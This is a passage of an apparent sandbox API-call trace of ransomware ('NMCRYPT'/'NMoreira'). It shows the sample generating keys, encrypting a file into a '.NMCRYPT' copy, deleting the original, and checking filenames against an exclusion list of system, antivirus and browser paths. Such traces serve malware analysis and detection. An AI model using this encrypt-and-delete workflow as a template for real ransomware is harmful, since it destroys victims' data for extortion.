pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.979] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.979] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0156.979] CryptHashData (hHash=0x9ad578, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.979] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad838) returned 1 [0156.979] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.979] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.979] wcslen (_String="\\\\?\\") returned 0x4 [0156.979] CryptDuplicateKey (in: hKey=0x9ad838, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad138) returned 1 [0156.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.980] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=738) returned 1 [0156.980] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.981] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.981] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.981] GetLastError () returned 0x0 [0156.981] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.982] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.982] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.982] GetLastError () returned 0x0 [0156.982] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.983] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0xe2, lpOverlapped=0x0) returned 1 [0156.983] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xe2, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xf0) returned 1 [0156.983] GetLastError () returned 0x0 [0156.983] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xf0, lpOverlapped=0x0) returned 1 [0156.983] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.983] WriteFile (in: hFile=0x588, lpBuffer=0x607e18*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0x20 [0156.983] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml", dwFileAttributes=0x20) returned 0 [0156.983] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 1 [0156.984] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0 [0156.984] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" [0156.984] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0156.984] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD873.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd873.tmp")) returned 0xd873 [0156.984] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD873.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd873.tmp"), dwFlags=0x1) returned 0 [0156.985] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD873.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd873.tmp")) returned 1 [0156.985] CryptDestroyKey (hKey=0x9ad138) returned 1 [0156.985] wcslen (_String="OK") returned 0x2 [0156.985] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.985] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.985] CryptDestroyKey (hKey=0x9ad838) returned 1 [0156.985] CryptDestroyHash (hHash=0x9ad578) returned 1 [0156.985] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0156.985] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*NMCRYPT") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*Recovers your files.html") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*.exe") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*.dll") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*.lnk") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*.bat") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*.ini") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*.msi") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*.scf") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*pagefile.sys*") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*AppData*") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\winrar\\*") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\java\\*") returned 0 [0156.985] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\windows\\*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\ESET\\*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\AVG\\*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*Atheros*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*Realtek*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*bootmgr*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*boot*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*boot*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*IO.SYS*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*ntldr*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*chrome*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*opera*") returned 0 [0156.986] PathMatchSpecW (pszFile="base_jpn.xml", pszSpec="*firefox*") returned 0 [0156.986] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml", pszSpec="*") returned 1 [0156.986] strlen (_Str="NMoreira") returned 0x8 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.986] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.987] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: 